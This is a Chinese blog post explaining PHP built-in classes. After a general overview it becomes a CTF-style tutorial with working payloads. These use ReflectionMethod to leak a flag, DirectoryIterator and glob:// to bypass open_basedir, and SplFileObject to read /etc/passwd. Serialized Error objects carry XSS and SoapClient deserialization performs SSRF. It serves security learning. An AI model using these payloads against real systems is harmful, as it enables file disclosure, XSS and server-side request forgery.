PHP原生类详解

最新推荐文章于 2023-11-20 08:52:03 发布
最新推荐文章于 2023-11-20 08:52:03 发布
阅读量771 收藏 6
点赞数 2
文章标签: php 开发语言
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_71467825/article/details/131332439
版权

什么是php原生类

PHP 原生类指的是 PHP 内置的类,它们可以直接在 PHP 代码中使用且无需安装或导入任何库。

以下是一些常用的 PHP 原生类:

1. DateTime 类:用于处理日期和时间,支持各种格式和时间区域。

2. PDO 类:用于访问和操作关系型数据库,如 MySQL、PostgreSQL 等。

3. FilesystemIterator 类:用于迭代文件系统目录,支持过滤器和递归。

4. DOMDocument 类:用于创建和操作 XML 文档,支持 XPath 查询和转换。

5. Reflection 类:用于分析和操作 PHP 代码的元数据,如类、方法、属性等。

6. Spl 类:用于实现各种数据结构和算法,如堆、队列、栈、哈希表等。

7. SimpleXMLElement 类:用于创建和操作 XML 元素,支持链式调用和属性设置。

8. ZipArchive 类:用于创建和解压 ZIP 压缩文件,支持密码保护和分卷压缩。

以上是一些常用的 PHP 原生类,它们覆盖了 PHP 应用开发中大部分的需求。开发人员可以根据自己的实际需求选择不同的类来完成各种任务。

PHP原生类是指PHP语言中自带的类,包括但不限于:字符串操作类、数组操作类、日期时间操作类等等。利用PHP原生类可以大大提高开发效率和代码质量。

以下是几个利用PHP原生类的实际应用:

1. 使用数组操作类实现数据排序:PHP原生数组操作类提供了sort()、rsort()、asort()、arsort()等函数,可方便地对数字和字符串类型的数组进行升序或降序排序。

2. 使用日期时间操作类生成时间戳:PHP原生日期时间操作类提供了多个时间戳函数,如time()、strtotime()、microtime()等,通过这些函数可以轻松获取当前时间或将日期时间转换为时间戳。

3. 使用字符串操作类进行文本处理:PHP原生字符串操作类提供了大量的字符串处理函数,如strlen()、substr()、strpos()、str_replace()等,能够实现字符串长度计算、字符截取、查找替换等常见的文本处理操作。

总的来说,PHP原生类提供了丰富的功能和方法,通过充分利用这些类,可以让PHP开发更加快速和高效。

以下是一个 PHP 原生类的示例代码:

class Person {
 
  private $name;
  private $age;
 
  function __construct($name, $age) {
    $this->name = $name;
    $this->age = $age;
  }
 
  public function getName() {
    return $this->name;
  }
 
  public function getAge() {
    return $this->age;
  }
 
  public function setName($name) {
    $this->name = $name;
  }
 
  public function setAge($age) {
    $this->age = $age;
  }
 
}


 

// 使用 Person 类创建一个新对象

$person = new Person("John Doe", 30);

// 打印对象的名字和年龄
echo "Name: " . $person->getName() . "<br>";
echo "Age: " . $person->getAge() . "<br>";

// 修改对象的名字和年龄
$person->setName("Jane Doe");
$person->setAge(25);

// 再次打印对象的名字和年龄
echo "Name: " . $person->getName() . "<br>";
echo "Age: " . $person->getAge() . "<br>";

这个示例代码定义了一个名为 `Person` 的类,它有两个私有属性 `$name` 和 `$age`,以及一个构造函数和四个公共方法,分别用于获取和设置对象的名字和年龄。代码使用 `new` 关键字创建了一个新的 `Person` 对象,并使用 `echo` 输出了对象的名字和年龄。然后,代码修改了对象的名字和年龄,并再次使用 `echo` 输出了修改后的值。

下面的题取自21年国赛题目

ReflectionMethod

(PHP 5 >=5.1.0,PHP7,PHP8)

源码:
<?php
highlight_file(__file__);
class User
{
    private static $c = 0;
    function a()
    {
        return   self::$c;
    }
    function b()
    {
        return   self::$c;
    }
    function c()
    {
    /**
         * flag{XINO}
         */
        return   self::$c;
    }
    function d()
    {
        return   self::$c;
    }
    function e()
    {
        return   self::$c;
    }
    function f()
    {
        return   self::$c;
    }
    function g()
    {
        return   self::$c;
    }
    function h()
    {
        return   self::$c;
    }
    function i()
    {
        return   self::$c;
    }
    function j()
    {
        return   self::$c;
    }
    function k()
    {
        return   self::$c;
    }
    function l()
    {
        return   self::$c;
    }
    function m()
    {
        return   self::$c;
    }
    function n()
    {
        return   self::$c;
    }
    function o()
    {
        return   self::$c;
    }
    function p()
    {
        return   self::$c;
    }
    function q()
    {
        return   self::$c;
    }
    function r()
    {
        return   self::$c;
    }
    function s()
    {
        return   self::$c;
    }
    function t()
    {
        return   self::$c;
    }
}
$rc=$_GET["rc"];
$rb=$_GET["rb"];
$ra=$_GET["ra"];
$rd=$_GET["rd"];
$method= new $rc($ra, $rb);
var_dump($method->$rd());

源码环境没有搞到,自己写了一个

rc是传入原生类名,rb和ra是传入类的属性,rd时传入类方法,后面就是实例化调用方法

payload:

?rc=ReflectionMethod&ra=User&rb=c&rd=getDocComment

读取目录/文件

DirectoryIterator

功能:便利指定目录里的文件,可以配合glob://协议使用匹配来寻找文件路径:

<?php
$dir = new DirectoryIterator("glob:///*flag*");
echo $dir;

或者遍历全部文件

<?php
$dir = new DirectoryIterator("/");
foreach($dir as $f){
    echo($f.'<br>');
//echo($f->__toString().'<bar>');
}

FilesystemIterator

使用方式与DirectoryIterator基本相同,这里就不细讲了

GlobIterator

Globlterator类也可以遍历一个文件目录,但与上面略不同的是其行为类似于glob(),可以通过模式匹配来寻找文件路径

它的特点就是,只需要知道部分名称就可以进行遍历

例如

<?php
$dir = new GlobIterator("/*flag*");
echo $dir;

绕过open_basedir

open_basedir将php所能打开的文件限制在指定的目录树中,包括文件本身,当程序要使用例如fopen()或file_get_contents()打开一个文件时,这个文件的位置将会被检查,当文件在指定的目录树之外,程序将拒绝打开

Directorylterator

DirectoryIterator与glob://协议在一起组合可以绕过open_basedir

测试

<?php
$dir = $_GET['XINO'];
$a = new DirectoryIterator($dir);
foreach($a as $f){
    echo($f.'<br>');
?>
# payload一句话的形式:
$a = new DirectoryIterator("glob:///*");foreach($a as $f){echo($f.'<br>');}

利用payload

/?XINO=glob:///*  #列出根目录下所有文件

FilesystemIterator

与上面基本一致,不在过多讨论

GlobIterator

根据该类特点,不用在配合glob://协议

一句话payload

$a = new FilesystemIterator("/*");foreach($a as $f){echo($f.'<br>');}

SplFileObject类

平常读取只能读取一行,要全部读取需要对内容进行遍历

<?php
$context = new SplFileObject('/etc/passwd');
foreach($context as $f){
    echo($f);
}

Error/Exception 内置类进行xss

Error:用于PHP7,8,开启报错

Error是所有PHP内部错误类的基类,该类是在PHP 7.0.0 中开始引入的

PHP7中,可以在echo时触发__toString,来构造XSS。

测试

<?php
$a = unserialize($_GET['XINO']);
echo $a;
?>

反序列化却没有pop链,只能找到php内置类来进行反序列化

poc:

<?php
$a = new Error("<script>alert('xss')</script>");
$b = serialize($a);
echo urlencode($b);
?>

传入输出会出现弹框,一个简单的利用

Exception 内置类

与上面类似,有兴趣的可以去复现一下

SoapClient类进行SSRF(这个知识点我在另外一篇文章里面讲到过,在这里宣传一下)

专门用来访问web服务的类,可以提供一个基于SOAP协议访问Web服务的PHP客户端

该内置类有一个__call方法,当__call方法被触发后,它可以发送HTTP和HTTPS请求,正是这个__call方法,使得SoapClient类可以被我们运用在SSRF中

构造函数

public SoapClient ::SoapClient(mixed $wsal [, array $options])

第一个参数是用来指明是否是wsdl模式,将该数值设为null则表示非wsdl模式

第二个参数为一个数组,如果在wsdl模式下,此参数可选;如果在非wsdl模式下,则必须设置location和uri选项,其中location是要讲请求发送到SOAP服务器的URL,而uri是SOAP服务的目标命名空间

<?php
$a = new SoapClient(null,array('location'=>'http://50.xxx.xxx.6:2333/XINO', 'uri'=>'http://50.xxx.xxx.60:2333'));
$b = serialize($a);
echo $b;
$c = unserialize($b);
$c->a();  //触发__call方法进行ssrf
?>

屿暖暖
关注
  • 2
    点赞
  • 6
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
关于php原生开发与主流php框架使用心得
api_Anzexi的博客
05-04 923
PHP是世界上最好的web开发语言
PHP读取大文件的SplFileObject使用介绍
10-26
一般读取文件我们用fopen 或者 file_get_contents ,前者可以循环读取,后者可以一次性读取,但都是将文件内容一次性加载来操作。
php原生的总结
unexpectedthing的博客
12-12 5338
文章目录前言利用Error/Exception 内置进行 XSSError内置Exception内置[BJDCTF 2nd]xss之光使用 Error/Exception 内置绕过哈希比较ErrorException [2020 极客大挑战]GreatphpSoapClient来进行SSRF 前言 之所以这个总结,极客大挑战的SoEzunser考到了php原生来遍历目录 其实,在CTF题目中,可以利用php原生来进行XSS,反序列化,SSRF,XXE和读文件的思路 通过遍历看一下php的内
PHP:【微信小程序】微信小程序API,微信小程序路由,微信小程序作用域,微信小程序网络通讯
ZzzWClock的博客
10-14 327
PHP:【微信小程序】微信小程序API,微信小程序路由,微信小程序作用域,微信小程序网络通讯 一.微信 API 1.什么是 API 小程序开发框架提供丰富的微信原生API,可以方便的调起微信提供的能力,如获取用户信息,本地存储,支付功能等 小程序提供的API按照功能主要分为几大:网络、媒体、文件、数据缓存、位置、设备、界面、界面节点信息还有一些特殊的开放接口 2.事件监听 API 以 on 开头的 API 用来监听某个事件是否触发 这 API 接受一个回调函数作为参数,当事件触发时会调用这个回
原生php api接口_API接口基础.php
weixin_42363854的博客
03-08 378
/*** 总控制器-API接口基础* 2019年9月22日9:16:23* ZJY*/namespace Api;class Base{// 构造函数public function __construct(){$token=$_GET['token'];if(empty($token)){session_start();$this->session_id=session_id();}els...
PHP原生总结利用
最新发布
php-yyds
11-20 165
PHP原生是指在PHP编程语言中自带的库,提供了丰富的功能和方法,可以直接使用,不需要额外安装或引入其他第三方库。
php去除html标记的原生函数详解
10-24
主要介绍了php去除html标记的原生函数详解,非常详细,需要的朋友可以参考下
详解PHP原生DOM对象操作XML的方法
10-21
大家都知道对于操作XML型文件,PHP内置有一套DOM对象可以进行处理。对XML的操作,从创建、添加到修改、删除都可以使用DOM对象中的函数来进行。下面这篇文章通过示例代码给大家介绍如何进行操作,有需要的朋友们...
php mysql访问数据库的步骤详解
12-16
最近一直用框架原生的都快忘了。 1.打开mysql连接 $resource1 = mysql_connect('localhost', 'root', 'root123');//参数1 主机名或主机ip、参数2数据库用户名、参数3数据库用户密码 if (!$resource1) {  die('...
phpcms开发微信小程序接口之获取栏目信息(get_categorys.php
fengye002011的博客
01-14 1508
首页在phpcms v9的api文件夹下创建get_categorys.php,访问路径是:***/api.php?op=get_category php代码: /** ** 栏目调用接口,栏目相关信息 ** catid 栏目id ,catid为空调用全部栏目 ** parentid 父栏目id 为0是调用一级栏目 为-1时调用全部栏目 ** catid和parentid
PHP博客源码 练手时开发
09-07
后台由本人在学习PHP练手时开发,现在和大家分享! 技术支持:http://www.kongdo.com/ 说明: 1、运行时需要创建数据库 数据库名称可以自己定义,创建好空数据库后 执行db.sql 文件创建表 2、配置config文件: 在ancludes文件夹下的config.php 更改数据库配置信息 3、后台/adminis/index.php 账户密码都是admin 4、导入已有数据 使用帝国备份软件 /adminis/backup/index.php 账户:admoin 密码:123456 已经备份的数据在\adminis\backup\bdata文件目录下
原生PHP接口
fdsal的博客
04-26 886
APP如何进行通信 APP与浏览器通信的异同 相同处:都是向服务器端发起HTTP请求,经过服务器端的逻辑处理后返回相对应的结果。 不同处: 请求来源 接口地址 返回数据格式 APP 不可见 xml或者json 浏览器 可见 html XML定义 扩展标记语言((Extensible Markup Language ,XML ) ,可以用来标记数据、定义数据型,是一种允许用户对自己的标记语言进行定义的源语言。 XML格式统一,跨平台和语言,非常适合传输和通信,早已成为业界公认的标准
PHP 原生学习与利用
snowlyzz的博客
09-22 1357
php 原生利用与学习。
PHP实战:PHP后台权限管理系统(PHP原生开发课程)
10-13
原生PHP开发后台权限管理系统:菜单管理,权限设置,用户管理等包含:后台用户登录,登录接口开发后台1级菜单管理:添加、录入、修改、删除后台2级菜单管理:添加、录入、修改、删除后台3级菜单管理:添加、录入、修改、删除后台管理用户的录入、添加、修改后台用户权限的设置、修改   
原生PHP(不定期更新)
小青年的博客
03-08 494
PHP知识点1.检测一个数是不是 2 的 n 次方2.根据身份证号计算年龄3.ip 转数字 1.检测一个数是不是 2 的 n 次方 &amp;amp;amp;lt;?php /** * 检测一个数是不是 2 的 n 次方 * @param string $number 数字 * @return bool */ function checkSquare($number = '') { $number ...
PHP原生的利用
qq_37466661的博客
08-11 338
PHP原生的利用
php原生语法的开发模式,PHP从基础语法到原生项目开发
weixin_39574050的博客
03-10 148
课程目录及下载链接:步骤1: PHP初体验本阶段主要介绍PHP运行环境、PHP的基本语法、常量和变量的使用、运算符的作用以及流程控制,让我们了解PHP语言,进入代码的殿堂。1.基本语法PHP的环境搭建、编辑器的安装,以及基本语法和PHP的工作原理。2.变量和数据PHP中的变量定义和使用、PHP中常见的数据型以及数据型转换。3.常量系统常量和自定义常量的定义和使用,以及预定义变量。4.运算符...
php原生开发文档,PHP原生模板
weixin_35817545的博客
04-04 173
### 使用原生PHP作为模板语言>[info]推荐:[流程控制的替代语法](http://php.net/manual/zh/control-structures.alternative-syntax.php)Smarty 的 if~~~{if $name == 'vip'}你好Vip{elseif $name == 'normal'}你好普通用户{else}你好游客{/if}~~~PHP...
原生
dazigeng4522的博客
09-29 238
今天做笔试题时发现了一个概念,查阅了文档之后才明白,原生的存在,慢慢学习慢慢进步吧! Java中,数据型分为基本数据型(或叫做原生、内置型)和引用数据型。 Java不是纯的面向对象的语言,不纯的地方就是这些基本数据型不是对象。当然初期Java的运行速度很慢,但是基本数据型能在一定程度上改善性能。如果你想编写纯的面向对象的程序,用包装器是取代基本数...
原生php封装一个验证码
03-29
以下是一个简单的原生PHP验证码的示例: ```php class Captcha { // 验证码字符长度 protected $length = 4; // 验证码宽度 protected $width = 100; // 验证码高度 protected $height = 40; // 验证码字符集 protected $charset = '0123456789'; // 验证码图片 protected $image; // 构造函数 public function __construct() { $this->create(); } // 生成验证码 public function create() { $this->image = imagecreatetruecolor($this->width, $this->height); $bgColor = imagecolorallocate($this->image, 255, 255, 255); imagefill($this->image, 0, 0, $bgColor); $code = $this->generateCode(); $textColor = imagecolorallocate($this->image, 0, 0, 0); $font = __DIR__ . '/arial.ttf'; for ($i = 0; $i < $this->length; $i++) { $x = ($this->width - 20) / $this->length * $i + 10; $y = $this->height / 2 + 10; imagettftext($this->image, 20, rand(-10, 10), $x, $y, $textColor, $font, $code[$i]); } header('Content-Type: image/png'); imagepng($this->image); } // 验证码校验 public function check($code) { if (strtolower($code) == strtolower($_SESSION['captcha'])) { return true; } else { return false; } } // 生成随机字符 protected function generateCode() { $code = ''; $charsetLength = strlen($this->charset); for ($i = 0; $i < $this->length; $i++) { $code .= $this->charset[rand(0, $charsetLength - 1)]; } $_SESSION['captcha'] = $code; return $code; } // 析构函数 public function __destruct() { imagedestroy($this->image); } } ``` 使用示例: ```php $captcha = new Captcha(); ``` 这将生成一个验证码图像并将其输出到浏览器。要检查用户输入的验证码是否正确,可以调用`check()`方法: ```php if ($captcha->check($_POST['captcha'])) { // 验证码正确 } else { // 验证码错误 } ``` 请注意,此示例仅用于演示目的。在实际应用程序中,您可能需要添加其他功能(例如:检查用户是否已经提交了表单,以防止滥用)并进行更多的安全检查。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值